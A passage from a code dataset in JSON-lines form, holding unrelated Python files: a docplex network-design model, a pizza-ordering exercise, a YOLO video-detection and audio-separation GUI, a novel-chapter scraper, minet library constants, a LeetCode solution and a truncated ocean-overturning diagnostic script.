df_inboundData.set_index(['plantId', 'dcId'])\n\n\ndf_outboundData = inputs['OUTBOUND_DATA']\ndf_outboundData = df_outboundData.set_index(['dcId', 'customerId'])\n#dd-markdown ### Create the Decision Optimization model\n#dd-markdown \n#dd-markdown Let's now create the optimization model using the `docplex.mp` package\n#dd-cell\n# CREATE CPLEX MODEL\n\nfrom docplex.mp.model import Model\nmdl = Model(name='NetworkDesign');\n#dd-markdown ### Create the decision variables\n#dd-markdown \n#dd-markdown We now create the decision variables:\n#dd-markdown * binary variable for each distribution center candidate, indictaing whether or not it should be open\n#dd-markdown * continuous variable for each product on each plant to distribution center segment indicating how much of this product flows on this link\n#dd-markdown * continuous variable for each product on each distribution center to customer segment indicating how much of this product flows on this link\n#dd-markdown \n#dd-markdown We also create auxiliary decision variables to represent:\n#dd-markdown * the cost of shipping products from distribution centers to customers\n#dd-markdown * the cost of storing products in distribution centers\n#dd-cell\n# CREATE VARIABLES\n\nopenDC = mdl.binary_var_dict(distributionCenters, name='openDC')\nshipDCToCustomer = mdl.continuous_var_cube(distributionCenters, products, customers, lb=0, name='shipDCToCustomer')\nshipPlantToDC = mdl.continuous_var_cube(plants, products, distributionCenters, lb=0, name='shipPlantToDC')\n\nshipDCCost = mdl.continuous_var_dict(distributionCenters, lb=0, name='shipDCCost')\nstoreDCCost = mdl.continuous_var_dict(distributionCenters, lb=0, name='storeDCCost')\n\n\nmdl.print_information()\n#dd-markdown ### Create the KPIs\n#dd-markdown \n#dd-markdown We create a KPI (Key Performance Indictaor) for each of the costs:\n#dd-markdown * variable plant cost\n#dd-markdown * inbound transportation cost (from plant to distribution center)\n#dd-markdown * outbound transportation cost (from distribution center to customer)\n#dd-markdown * fixed distribution centers cost \n#dd-markdown * variable distribution center cost\n#dd-markdown \n#dd-markdown We also create a KPI to easily report the number of new opened distribution centers.\n#dd-cell\n# CREATE KPIS\n\nvariablePlantCost = mdl.sum( df_productionData.varPlantCost[pl, pr] * shipPlantToDC[pl, pr, dc]\n for pl in plants for pr in products for dc in distributionCenters)\nmdl.add_kpi(variablePlantCost, 'variablePlantCost')\n\ninboundTransportationCost = mdl.sum( df_inboundData.unitCost[pl, dc]*shipPlantToDC[pl, pr, dc]\n for pl in plants for pr in products for dc in distributionCenters)\nmdl.add_kpi(inboundTransportationCost, 'inboundTransportationCost')\n\noutboundTransportationCost = mdl.sum( shipDCCost[dc] for dc in distributionCenters)\nmdl.add_kpi(outboundTransportationCost, 'outboundTransportationCost')\n\nfixedDistributionCenterCost = mdl.sum( df_distributionCenters.fixedCost[d] * openDC[d] for d in distributionCenters);\nmdl.add_kpi(fixedDistributionCenterCost, 'fixedDistributionCenterCost');\n\nvariableDistributionCenterCost = mdl.sum ( storeDCCost[dc] for dc in distributionCenters)\nmdl.add_kpi(variableDistributionCenterCost, 'variableDistributionCenterCost');\n\nnbOpenDistributionCenters = mdl.sum( openDC[dc] for dc in distributionCenters)\nmdl.add_kpi(nbOpenDistributionCenters, 'nbOpenDistributionCenters')\n\nmdl.print_information()\n#dd-markdown ### Create the objective\n#dd-markdown \n#dd-markdown Here the objective is simply the sum of the 5 cost KPIs.\n#dd-cell\n\n# CREATE OBJECTIVE\n\nmdl.minimize( variablePlantCost + inboundTransportationCost +\n outboundTransportationCost + variableDistributionCenterCost +\n fixedDistributionCenterCost )\n\nmdl.print_information()\n#dd-markdown ### Create the constraints\n#dd-markdown \n#dd-markdown The constraints are:\n#dd-markdown * capacity constraints:\n#dd-markdown * one on the plants and products\n#dd-markdown * one on the plants and products and distribution centers\n#dd-markdown * demand satisfaction: what is shipped to customer is exactly the quantity they expect\n#dd-markdown * flow on distribution centers structural constraint: what goes in from plants goes out to customers.\n#dd-markdown * cost variables definition constraints \n#dd-cell\n# CREATE CONSTRAINTS\n\n# Two capacity constraints\nfor pl in plants:\n for pr in products:\n mdl.add_constraint( mdl.sum( shipPlantToDC[pl, pr, dc] for dc in distributionCenters) <= df_productionData.capacity[pl, pr] )\n for dc in distributionCenters:\n for pr in products:\n mdl.add_constraint(shipPlantToDC[pl, pr, dc] <= openDC[dc] * df_productionData.capacity[pl, pr])\n\n# Satisfy demand\nfor cu in customers:\n for pr in products:\n if (cu, pr) in df_demand.index:\n mdl.add_constraint( mdl.sum(shipDCToCustomer[dc, pr ,cu] for dc in distributionCenters) == df_demand.quantity[cu, pr]);\n\n# Structural constraint flow\nfor pr in products:\n for dc in distributionCenters:\n mdl.add_constraint( mdl.sum( shipPlantToDC[pl, pr, dc] for pl in plants) ==\n mdl.sum(shipDCToCustomer[dc, pr, cu] for cu in customers) );\n\n# cost variable definition\nfor dc in distributionCenters:\n mdl.add_constraint( shipDCCost[dc] ==\n mdl.sum(df_outboundData.costPerUnit[dc, cu] * mdl.sum(shipDCToCustomer[dc, pr, cu] for pr in products) for cu in customers) )\n mdl.add_constraint( storeDCCost[dc] ==\n mdl.sum(df_storageData.costPerUnit[dc, pr] * mdl.sum(shipDCToCustomer[dc, pr, cu] for cu in customers) for pr in products) )\n\n \n\nmdl.print_information()\n#dd-markdown ### Additional constraints\n#dd-markdown \n#dd-markdown We also add a constraint on the minimum and maximum number of new distribution centers.\n#dd-cell\nMIN_OPEN_DCS = df_parameters.value['MIN_OPEN_DCS']\nmdl.add_constraint( nbOpenDistributionCenters >= MIN_OPEN_DCS )\nMAX_OPEN_DCS = df_parameters.value['MAX_OPEN_DCS']\nmdl.add_constraint( nbOpenDistributionCenters <= MAX_OPEN_DCS )\n\nmdl.print_information()\n#dd-markdown ### Solve the optimization problem\n#dd-markdown \n#dd-markdown We can now solve the optimization problem.\n#dd-markdown \n#dd-markdown **Remember that if you don't limit the number of products and/or customers and the number of variables or constraints goes above 1000, you will need to use the dedicate DO environment**\n#dd-cell\n# Solve\nmdl.parameters.threads = 1\nmdl.solve(log_output=True)\n\nmdl.report();\n#dd-markdown ### Create solution\n#dd-markdown \n#dd-markdown Now the problem is solved, we can extarct solutions into pandas fdata frame for a better reporting\n#dd-cell\n# Create solution\n\ndf_openDC = pd.DataFrame(data= [ [dc, openDC[dc].solution_value] for dc in distributionCenters],\n columns = ['dcId', 'open'] )\nprint(df_openDC)\n\ndf_shipDCToCustomer = pd.DataFrame(data= [ [dc, pr, cu, shipDCToCustomer[dc, pr, cu].solution_value] for dc in distributionCenters for pr in products for cu in customers],\n columns = ['dcId', 'productId', 'customerId', 'ship'] )\nprint (df_shipDCToCustomer)\n\ndf_shipPlantToDC = pd.DataFrame(data= [ [pl, pr, dc, shipPlantToDC[pl, pr, dc].solution_value] for pl in plants for pr in products for dc in distributionCenters],\n columns = ['plantId', 'productId', 'dcId', 'ship'] )\nprint (df_shipPlantToDC)\n\n\ndf_dcCosts = pd.DataFrame(data= [ [dc, df_distributionCenters.city[dc], shipDCCost[dc].solution_value, storeDCCost[dc].solution_value] for dc in distributionCenters],\n columns = ['dcId', 'dcCity', 'shipCost', 'storeCost'] )\nprint(df_dcCosts)\n\noutputs = {}\noutputs['openDC'] = df_openDC\noutputs['shipDCToCustomer'] = df_shipDCToCustomer\noutputs['shipPlantToDC'] = df_shipPlantToDC\noutputs['dcCosts'] = df_dcCosts\n#dd-cell\n\n","repo_name":"IBMDecisionOptimization/do-ws-pa","sub_path":"workspaces/networkdesign/do/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":11617,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"37"} +{"seq_id":"27932756444","text":"#Ejercicio 3 Semana 2 Lunes\nwhile True:\n tipo =input(\"Ingresar el tipo de pizza que quiere, V siendo vegetariana y N no vegetariana:\").upper()\n if tipo != \"V\" and tipo !=\"N\":\n print(\"Ingreso invalido, intente de nuevo\")\n else:\n break\n\nif tipo == \"V\":\n ingredientes = [\"Tofu\", \"Pimiento\"]\nelse:\n ingredientes = [\"Peperoni\", \"Jamon\", \"Salmon\"]\n\nprint(\"A continuacion tiene los ingredientes disponibles para añadir a su pizza:\", ingredientes)\nseleccion = int(input(f\"Seleccione uno de los ingredientes, siendo 0 el primero y {len(ingredientes)-1}, el ultimo:\"))\n\nif tipo == \"V\":\n print(\"Usted selecciono la pizza vegetariana\")\n print(f\"Con la adicion de {ingredientes[seleccion]}\")\nelse:\n print(\"Usted selecciono la pizza no vegetariana\")\n print(f\"Con la adicion de {ingredientes[seleccion]}\")\n","repo_name":"JuanBerriz/Programacion_Algoritmo_Repo","sub_path":"Semana 2/Ejercicio3.py","file_name":"Ejercicio3.py","file_ext":"py","file_size_in_byte":833,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"24792267460","text":"import numpy as np\nimport imutils\nimport time\nimport cv2\nimport os\nfrom pathlib import Path\nimport PySimpleGUIQt as sg\nimport gallery\nimport media_player\nimport copy\nimport moviepy.editor as mp \nfrom spleeter.separator import Separator\nimport copy\n\ni_vid = 'Enter path to input video'\no_vid = 'Enter path to output video'\no_sound = 'Enter path to output'\nyoloModelPath = Path().parent.absolute()\nyoloModelPath = str(yoloModelPath) + \"/yoloModel/\"\nsg.ChangeLookAndFeel('LightGrey')\n\nlayout1 = [\n\t\t[sg.Text('Perform YOLO Object Detection', size=(50,1), font=('Any',18),text_color='#1c86ee' ,justification='left')],\n\t\t[sg.Text('Path to input video'), sg.In(i_vid,size=(40,1), key='input'), sg.FileBrowse(size=(75, 30))],\n\t\t[sg.Text('Path to output video'), sg.In(o_vid,size=(40,1), key='output'), sg.FileSaveAs(size=(75, 30))],\n\t\t[sg.Text('Confidence'), sg.Slider(range=(0,10),orientation='h', resolution=1, default_value=5, size=(15,15), key='confidence'), sg.T(' ', key='_CONF_OUT_')],\n\t\t[sg.Text('Threshold'), sg.Slider(range=(0,10), orientation='h', resolution=1, default_value=3, size=(15,15), key='threshold'), sg.T(' ', key='_THRESH_OUT_')],\n\t\t[sg.Text(' '*8), sg.Checkbox('Write output video to disk', key='_DISK_')],\n\t\t[sg.OK(size=(100, 30)), sg.Stretch()],\n\t]\n\nlayout2 = [[sg.Text('Extract Audio from different sources', size=(50,1), font=('Any',18),text_color='#1c86ee' ,justification='left')],\n [sg.Text('Path to input video'), sg.In(i_vid,size=(40,1), key='inputSound'), sg.FileBrowse(size=(75, 30))],\n\t\t [sg.Text('Path to output sound tracks'), sg.In(o_sound,size=(40,1), key='outputSound'), sg.FileSaveAs(size=(75, 30))],\n\t\t [sg.Button('Extract Sound', size=(100, 30))]]\n\nlayout = [[sg.Column(layout1, key='-COLYOLO-'), sg.Column(layout2, visible=False, key='-COLSound-')],\n\t\t [sg.Frame(layout=[[sg.Button('YOLO', size=(50, 30)),\n\t\t sg.Button('Sound', size=(60, 30)), \n\t\t sg.Button('YOLO Saved Frames', size=(200, 30)), \n\t\t sg.Button('Exit', size=(50, 30))],\n\t\t ], title='Options', title_color='red', relief=sg.RELIEF_SUNKEN)\n\t\t ]]\n\nwin = sg.Window('Psychic CCTV',\n\t\t\t\tdefault_element_size=(21,1),\n\t\t\t\ttext_justification='right',\n\t\t\t\tauto_size_text=False).Layout(layout)\n\nlayoutVis = 'YOLO'\nwhile True:\n\tevent, values = win.Read()\n\n\tif event in 'YOLO Sound':\n\t\twin[f'-COL{layoutVis}-'].update(visible=False)\n\t\tlayoutVis = event\n\t\twin[f'-COL{layoutVis}-'].update(visible=True)\n\n\tif event == 'YOLO Saved Frames':\n\t\twin.Close()\n\t\tgallery.displayImages()\n\n\tif event is None or event =='Exit':\n\t\texit()\n\n\tif event == 'Extract Sound':\n\t\tprint(\"Sed Life\")\n\t\t# Add the spleeter thing here\n\t\t# Yeah done \n\t\tclip = mp.VideoFileClip(values[\"inputSound\"])\n\t\toutputs = os.getcwd() + '/inference/' +'sounds/' \n\t\tprint(outputs)\n\t\tclip.audio.write_audiofile(r\"sound.mp3\") \n\t\tseparator = Separator('spleeter:5stems')\n\t\tsounds_file = os.getcwd() + '/sound.mp3'\n\t\tprint(sounds_file)\n\t\tseparator.separate_to_file(sounds_file, 'output')\n\t\tmedia_player.MediaPlayerGUI()\n\n\tif event == 'OK':\n\t\twrite_to_disk = values['_DISK_']\n\t\targs = values\n\n\t\twin.Close()\n\n\t\tgui_confidence = args[\"confidence\"]/10\n\t\tgui_threshold = args[\"threshold\"]/10\n\n\t\tlabelsPath = os.path.sep.join([yoloModelPath, \"model.names\"])\n\t\tLABELS = open(labelsPath).read().strip().split(\"\\n\")\n\n\t\tnp.random.seed(42)\n\t\tCOLORS = np.random.randint(0, 255, size=(len(LABELS), 3),\n\t\t\tdtype=\"uint8\")\n\n\t\tweightsPath = os.path.sep.join([yoloModelPath, \"yolov3.weights\"])\n\t\tconfigPath = os.path.sep.join([yoloModelPath, \"yolov3.cfg\"])\n\n\t\tprint(\"[INFO] loading YOLO from disk...\")\n\t\tnet = cv2.dnn.readNetFromDarknet(configPath, weightsPath)\n\t\tln = net.getLayerNames()\n\t\tln = [ln[i[0] - 1] for i in net.getUnconnectedOutLayers()]\n\n\t\tvs = cv2.VideoCapture(args[\"input\"])\n\t\twriter = None\n\t\t(W, H) = (None, None)\n\n\t\ttry:\n\t\t\tprop = cv2.cv.CV_CAP_PROP_FRAME_COUNT if imutils.is_cv2() \\\n\t\t\t\telse cv2.CAP_PROP_FRAME_COUNT\n\t\t\ttotal = int(vs.get(prop))\n\t\t\tprint(\"[INFO] {} total frames in video\".format(total))\n\n\t\texcept:\n\t\t\tprint(\"[INFO] could not determine # of frames in video\")\n\t\t\tprint(\"[INFO] no approx. completion time can be provided\")\n\t\t\ttotal = -1\n\n\t\twin_started = False\n\t\tFrame_number = 0\n\n\t\twhile True:\n\t\t\tgrabbed, frame = vs.read()\n\t\t\tformat_frame = [copy.deepcopy(frame),copy.deepcopy(frame)]\n\t\t\tif not grabbed:\n\t\t\t\tbreak\n\n\t\t\tif W is None or H is None:\n\t\t\t\t(H, W) = format_frame[0].shape[:2]\n\n\t\t\tblob = cv2.dnn.blobFromImage(format_frame[0], 1 / 255.0, (416, 416),\n\t\t\t\tswapRB=True, crop=False)\n\t\t\tnet.setInput(blob)\n\t\t\tstart = time.time()\n\t\t\tlayerOutputs = net.forward(ln)\n\t\t\tend = time.time()\n\n\t\t\tboxes = []\n\t\t\tconfidences = []\n\t\t\tclassIDs = []\n\n\t\t\tfor output in layerOutputs:\n\t\t\t\tfor detection in output:\n\t\t\t\t\tscores = detection[5:]\n\t\t\t\t\tclassID = np.argmax(scores)\n\t\t\t\t\tconfidence = scores[classID]\n\n\t\t\t\t\tif confidence > gui_confidence:\n\t\t\t\t\t\tbox = detection[0:4] * np.array([W, H, W, H])\n\t\t\t\t\t\t(centerX, centerY, width, height) = box.astype(\"int\")\n\n\t\t\t\t\t\tx = int(centerX - (width / 2))\n\t\t\t\t\t\ty = int(centerY - (height / 2))\n\n\t\t\t\t\t\tboxes.append([x, y, int(width), int(height)])\n\t\t\t\t\t\tconfidences.append(float(confidence))\n\t\t\t\t\t\tclassIDs.append(classID)\n\n\t\t\tidxs = cv2.dnn.NMSBoxes(boxes, confidences, gui_confidence, gui_threshold)\n\n\t\t\tif len(idxs) > 0:\n\t\t\t\tcount = 0\n\t\t\t\tfor i in idxs.flatten():\n\t\t\t\t\tformat_frame[1] = copy.deepcopy(frame)\n\t\t\t\t\t(x, y) = (boxes[i][0], boxes[i][1])\n\t\t\t\t\t(w, h) = (boxes[i][2], boxes[i][3])\n\n\t\t\t\t\tcolor = [int(c) for c in COLORS[classIDs[i]]]\n\t\t\t\t\tfor g in range(len(format_frame)):\n\t\t\t\t\t\tcv2.rectangle(format_frame[g], (x, y), (x + w, y + h), color, 2)\n\t\t\t\t\t\ttext = \"{}: {:.4f}\".format(LABELS[classIDs[i]],\n\t\t\t\t\t\t\tconfidences[i])\n\t\t\t\t\t\tcv2.putText(format_frame[g], text, (x, y - 5),\n\t\t\t\t\t\t\tcv2.FONT_HERSHEY_SIMPLEX, 0.5, color, 2)\n\t\t\t\t\t\toutputer = os.getcwd() + '/inference/Objects/' + LABELS[classIDs[i]] \\\n\t\t\t\t\t\t\t\t\t+ str(Frame_number) +'_' + str(count) + '.jpg'\n\t\t\t\t\t\tcv2.imwrite(outputer,format_frame[1])\n\t\t\t\t\tcount += 1\n\t\t\tif write_to_disk:\n\t\t\t\tif writer is None:\n\t\t\t\t\tfourcc = cv2.VideoWriter_fourcc(*\"MJPG\")\n\t\t\t\t\twriter = cv2.VideoWriter(args[\"output\"], fourcc, 30,\n\t\t\t\t\t\t(format_frame[0].shape[1], format_frame[0].shape[0]), True)\n\n\t\t\t\t\tif total > 0:\n\t\t\t\t\t\telap = (end - start)\n\t\t\t\t\t\tprint(\"[INFO] single frame took {:.4f} seconds\".format(elap))\n\t\t\t\t\t\tprint(\"[INFO] estimated total time to finish: {:.4f}\".format(\n\t\t\t\t\t\t\telap * total))\n\n\t\t\t\twriter.write(format_frame[0])\n\t\t\timgbytes = cv2.imencode('.png', format_frame[0])[1].tobytes() \n\n\t\t\tif not win_started:\n\t\t\t\twin_started = True\n\t\t\t\tlayout = [\n\t\t\t\t\t[sg.Text('Labelled Video', size=(30,1))],\n\t\t\t\t\t[sg.Image(data=imgbytes, key='_IMAGE_')],\n\t\t\t\t\t[sg.Text('Confidence'),\n\t\t\t\t\tsg.Slider(range=(0, 10), orientation='h', resolution=1, default_value=5, size=(15, 15), key='confidence'),\n\t\t\t\t\tsg.Text('Threshold'),\n\t\t\t\t\tsg.Slider(range=(0, 10), orientation='h', resolution=1, default_value=3, size=(15, 15), key='threshold')],\n\t\t\t\t\t[sg.Exit(size=(50, 30))]\n\t\t\t\t]\n\t\t\t\twin = sg.Window('Object Detection Output',\n\t\t\t\t\t\t\t\tdefault_element_size=(14, 1),\n\t\t\t\t\t\t\t\ttext_justification='right',\n\t\t\t\t\t\t\t\tauto_size_text=False).Layout(layout).Finalize()\n\t\t\t\timage_elem = win.FindElement('_IMAGE_')\n\t\t\telse:\n\t\t\t\timage_elem.Update(data=imgbytes)\n\n\t\t\tevent, values = win.Read(timeout=0)\n\t\t\tif event is None or event == 'Exit':\n\t\t\t\tbreak\n\t\t\tgui_confidence = values['confidence']/10\n\t\t\tgui_threshold = values['threshold']/10\n\t\t\t\n\t\t\tprint(Frame_number)\n\t\t\tFrame_number += 1\n\n\nwin.Close()\n\nprint(\"[INFO] cleaning up...\")\nwriter.release() if writer is not None else None\nvs.release()\n","repo_name":"Fireboltz/Psychic-CCTV","sub_path":"psychicCCTV.py","file_name":"psychicCCTV.py","file_ext":"py","file_size_in_byte":7527,"program_lang":"python","lang":"en","doc_type":"code","stars":34,"dataset":"github-code","pt":"37"} +{"seq_id":"18383576485","text":"import re\nimport urllib.request\nimport requests\n\nimport pandas as pd\n\n\ndef get_content(url, n):\n response = requests.get(url)\n\n context = re.findall(r'chapterContent:\".*?\"', response.text)\n\n path = 'E:/mjy-workspace/python/Python_Reptile/resource/'\n\n file = open(path + str(n) + \".txt\", \"w\", encoding='gbk')\n\n for c in context:\n s = c.replace(\"chapterContent:\", \"\")\n s = s.replace(\"\\\\u003Cp\\\\u003E\", \"\")\n s = s.replace(\"\\\\r\\\\u003C\\\\u002Fp\\\\u003E\", \"\")\n s = s.replace(\"\\\\u003C\\\\u002Fp\\\\u003E\", \"\")\n s = s.replace('\"', '')\n file.write(s)\n\n file.close()\n\n\ndef get_number(base_url):\n res = requests.get(base_url)\n number = re.findall(\"目录(.\\\\d*)\", res.text)\n num = number[0].replace(\"(\", \"\")\n for i in range(1, int(num)):\n get_content(base_url + str(i), i)\n\n\nif __name__ == '__main__':\n get_number('https://book.qq.com/book-detail/46888796')\n","repo_name":"ykongl/Python","sub_path":"Python_Reptile/qq_novel.py","file_name":"qq_novel.py","file_ext":"py","file_size_in_byte":923,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"8329967861","text":"# =============================================================================\n# Minet Default Values Collection\n# =============================================================================\n#\n# Listing sane default values used throughout the whole library.\n#\nfrom urllib3 import Timeout\n\n\n# Fetch-related\nDEFAULT_GROUP_PARALLELISM = 1\nDEFAULT_GROUP_BUFFER_SIZE = 25\nDEFAULT_THROTTLE = 0.2\nDEFAULT_CONNECT_TIMEOUT = 5\nDEFAULT_READ_TIMEOUT = 25\nDEFAULT_URLLIB3_TIMEOUT = Timeout(connect=DEFAULT_CONNECT_TIMEOUT, read=DEFAULT_READ_TIMEOUT)\nDEFAULT_SPOOFED_UA = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:84.0) Gecko/20100101 Firefox/84.0'\n\nCOOKIE_BROWSERS = {\n 'chrome',\n 'chromium',\n 'firefox',\n 'opera',\n 'edge'\n}\n","repo_name":"lebelgique/minet","sub_path":"minet/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":739,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"37"} +{"seq_id":"35672429820","text":"'''\nhttps://leetcode.com/explore/interview/card/google/59/array-and-strings/467/\n'''\n\nclass Solution(object):\n def isValid(self, s):\n \"\"\"\n :type s: str\n :rtype: bool\n \"\"\"\n dict_s = {\n \"]\" : \"[\",\n \"}\" : \"{\",\n \")\" : \"(\"\n }\n\n stack = []\n\n for c in s:\n if c in dict_s.values():\n stack.append(c)\n elif c in dict_s.keys():\n stack.append(c)\n if len(stack) > 1 and stack[-2] == dict_s[c]:\n stack.pop()\n stack.pop()\n return len(stack) == 0\n ","repo_name":"DemonZhou/leetcode","sub_path":"Valid Parentheses.py","file_name":"Valid Parentheses.py","file_ext":"py","file_size_in_byte":647,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"6689506339","text":"# Calculate diagnostics of the ocean model meridional overturning\n# Original ferret calculation doesn't handle staggered grids properly, so just use\n# simple numpy arrays here\n\n# Basin file is\n\n# Arguments are archive directory and run id name\n\nimport netCDF4, sys, os, glob\nfrom pathlib import Path\nimport numpy as np\n\narchivedir = sys.argv[1]\nrunid = sys.argv[2]\n\n# Check for any new complete years\nflist = sorted(list(glob.glob(os.path.join(archivedir,'ocean_month.nc-[0-9]*1231'))))\nif not flist:\n print(\"Nothing to process\")\n sys.exit(0)\n\nlastfile = flist[-1]\nlastfile_year = int(lastfile[-8:-4])\n\ndef isleap(year):\n # Proleptic gregreogian\n if year % 100 == 0:\n return year%400==0\n else:\n return year%4==0\n\ndef process(d):\n # These are on the yu_ocean grid\n ty_trans = d.variables['ty_trans'][:]\n ty_trans_gm = d.variables['ty_trans_gm'][:]\n\n # To match ferret behaviour, choose the region using the coordinate bounds\n # depth[k] has bounds depth_edges[k] and depth_edges[k+1]\n depth = d.variables['st_ocean'][:]\n depth_edges = d.variables['st_edges_ocean'][:]\n # Level that includes depth 3000 is first for which bottom edges is > 3000\n ilev_3000 = np.argmax(depth_edges > 3000) - 1\n ilev_5000 = np.argmax(depth_edges > 5000) - 1\n # print(\"Levels\", ilev_3000, ilev_5000, depth[ilev_3000], depth[ilev_5000])\n\n lat = d.variables['grid_yu_ocean'][:]\n # lat[k] has bounds lat_edges[k] and lat_edges[k+1], except at N extreme which isn't needed here\n lat_edges = d.variables['grid_yt_ocean'][:]\n ilat_m60 = np.argmax(lat_edges > -60) - 1\n ilat_30 = np.argmax(lat_edges > 30) - 1\n ilat_60 = np.argmax(lat_edges > 60) - 1\n ilat_26 = np.argmin(abs(lat-26)) - 1\n # print(\"Lats\", ilat_m60, ilat_30, lat[ilat_m60], lat[ilat_30])\n\n dmask = netCDF4.Dataset(\"/g/data/p66/ars599/plot_paper_data/lsmask_20110618.nc\")\n # Only want the top level of the mask\n mask = dmask.variables['mask_tucell'][0]\n\n moc_glb = ty_trans.sum(axis=3).cumsum(axis=1) + ty_trans_gm.sum(axis=3)\n # aabwf = MOC_gbl[y=-80:-60@min,z=1:3000@min]\n aabwf = moc_glb[:,:ilev_3000+1,:ilat_m60+1].min(axis=(1,2))\n # sodc = MOC_gbl[y=-60:30@min, z=3000:5000@min]\n sodc = moc_glb[:,ilev_3000:ilev_5000+1,ilat_m60:ilat_30+1].min(axis=(1,2))\n\n # Atlantic defined by mask=2, 4. Want to mask out non-Atlantic points so invert this\n mask_atl = np.logical_not(np.logical_or(mask==2, mask==4))\n # Automatic broadcasting doesn't work\n # ty_trans_atl = np.ma.masked_array(ty_trans, mask_atl[np.newaxis, np.newaxis,:,:])\n mask_atl = np.broadcast_to(mask_atl, ty_trans.shape)\n ty_trans_atl = np.ma.masked_array(ty_trans, mask_atl)\n ty_trans_gm_atl = np.ma.masked_array(ty_trans_gm, mask_atl)\n moc_atl = ty_trans_atl.sum(axis=3).cumsum(axis=1) + ty_trans_gm_atl.sum(axis=3)\n # nadwf = MOC_atl[y=30:60@max, z=1:3000@max]\n nadwf = moc_atl[:,:ilev_3000+1,ilat_30:ilat_60+1].max(axis=(1,2))\n amoc26n = moc_atl[:,:ilev_3000+1,ilat_26].max(axis=1)\n\n return aabwf, sodc, nadwf, amoc26n\n\ndef createfile(filename,lastfile):\n # Create a new file for the global mean with time and level dimensions\n dnew = netCDF4.Dataset(filename, 'w')\n # Any file will do for getting dimensions etc\n d = netCDF4.Dataset(lastfile)\n\n # Dimensions and coordinate variables\n dnew.createDimension('nv', 2)\n time = d.variables['time']\n # This is inconsistent across model runs for some reason\n tbounds_name = getattr(time, \"bounds\")\n assert tbounds_name[:5] == 'time_'\n bounds_name = tbounds_name[5:]\n time_bounds = d.variables[tbounds_name]\n for newvar in ('time', 'year'):\n dnew.createDimension(newvar, None)\n dnew.createVariable(newvar, np.float64, (newvar,))\n tnew = dnew.variables[newvar]\n for attr in time.ncattrs():\n # Missing value in the bounds shouldn't occur\n # MOM files incorrectly set calendar as gregorian rather\n # than proleptic\n if attr not in (\"missing_value\", \"_FillValue\", \"calendar\", \"calendar_type\"):\n setattr(tnew, attr, getattr(time,attr))\n tnew.calendar = \"proleptic_gregorian\"\n # This case isn't handled correctly by the previous iteration\n if newvar == 'year':\n tnew.bounds = f'year_{bounds_name}'\n dnew.createVariable(f'{newvar}_{bounds_name}', np.float64, (newvar,'nv'))\n tnew = dnew.variables[f'{newvar}_{bounds_name}']\n for attr in time_bounds.ncattrs():\n # Missing value in the bounds shouldn't occur\n if attr not in (\"missing_value\", \"_FillValue\"):\n setattr(tnew, attr, getattr(time_bounds,attr))\n\n # Variables\n dnew.createVariable('nadwf', np.float32, ('time',))\n nadwf = dnew.variables['nadwf']\n nadwf.units = '1e9 kg/s'\n nadwf.standard_name = \"ocean_y_overturning_mass_streamfunction\"\n nadwf.long_name = \"North Atlantic deep water formation\"\n dnew.createVariable('amoc26n', np.float32, ('time',))\n amoc26n = dnew.variables['amoc26n']\n amoc26n.units = '1e9 kg/s'\n amoc26n.standard_name = \"ocean_y_overturning_mass_streamfunction\"\n amoc26n.long_name = \"Maximum AMOC at 26N\"\n dnew.createVariable('aabwf', np.float32, ('time',))\n aabwf = dnew.variables['aabwf']\n aabwf.units = '1e9 kg/s'\n aabwf.standard_name = \"ocean_y_overturning_mass_streamfunction\"\n aabwf.long_name = \"Antarctic bottom water formation\"\n dnew.createVariable('sodc', np.float32, ('time',))\n sodc = dnew.variables['sodc']\n sodc.units = '1e9 kg/s'\n sodc.standard_name = \"ocean_y_overturning_mass_streamfunction\"\n sodc.long_name = \"Deep cell originating from Southern Ocean\"\n for vname in ('nadwf', 'amoc26n', 'aabwf', 'sodc'):\n # Create annual mean\n var = dnew.variables[vname]\n annname = '%s_ann' % vname\n dnew.createVariable(annname, np.float32, ('year',))\n annvar = dnew.variables[annname]\n for attr in var.ncattrs():\n setattr(annvar, attr, getattr(var,attr))\n d.close()\n return dnew\n\nfname = 'ocean_MOC_%s.nc' % runid\nif Path(fname).exists():\n dout = netCDF4.Dataset(fname, 'r+')\nelse:\n dout = createfile(fname, lastfile)\n\ntime = dout.variables['time']\nnt = len(time)\n\nif nt%12 != 0:\n raise Exception(\"Unexpected state: In file %s. nt=%d is not a multiple of 12\" % (fname, nt))\n\ntry:\n time_bounds = dout.variables['time_bounds']\n bounds_name = 'bounds'\nexcept KeyError:\n time_bounds = dout.variables['time_bnds']\n bounds_name = 'bnds'\nnadwf = dout.variables['nadwf']\namoc26n = dout.variables['amoc26n']\naabwf = dout.variables['aabwf']\nsodc = dout.variables['sodc']\n\nyearvar = dout.variables['year']\nyear_bounds = dout.variables[f'year_{bounds_name}']\n\nif nt > 0:\n lastdate = netCDF4.num2date(time[-1], time.units, time.calendar)\n lastyear = lastdate.year\nelse:\n # Set lastyear to year of first file -1 so loop starts correctly\n firstfile = flist[0]\n lastyear = int(firstfile[-8:-4]) - 1\n\nif lastfile_year > lastyear:\n print('Data to process', runid, lastyear+1, lastfile_year)\n # Loop is over expected years, so missing files will cause an error.\n for year in range(lastyear+1, lastfile_year+1):\n flist_year = glob.glob(os.path.join(archivedir,'ocean_month.nc-%4.4d[0-9]*' % (year)))\n if isleap(year):\n mwts = np.array([31,29,31,30,31,30,31,31,30,31,30,31])/366.\n else:\n mwts = np.array([31,28,31,30,31,30,31,31,30,31,30,31])/365.\n # Initial check that we have 12 months. May get a failure if\n # mppcombine is still running.\n nm = 0\n for f in sorted(flist_year):\n d = netCDF4.Dataset(f)\n time_in = d.variables['time']\n nm += len(time_in)\n if nm != 12:\n print(\"Missing files for year %d, nm=%d:\" % (year, nm), flist_year, file=sys.stderr)\n raise Exception(\"Missing files\")\n for f in sorted(flist_year):\n d = netCDF4.Dataset(f)\n time_in = d.variables['time']\n time_bounds_in = d.variables[f'time_{bounds_name}']\n offset = len(time)\n # Check whether the dates match\n if offset:\n lastdate = netCDF4.num2date(time[-1], time.units, time.calendar)\n newdate = netCDF4.num2date(time_in[0], time_in.units, 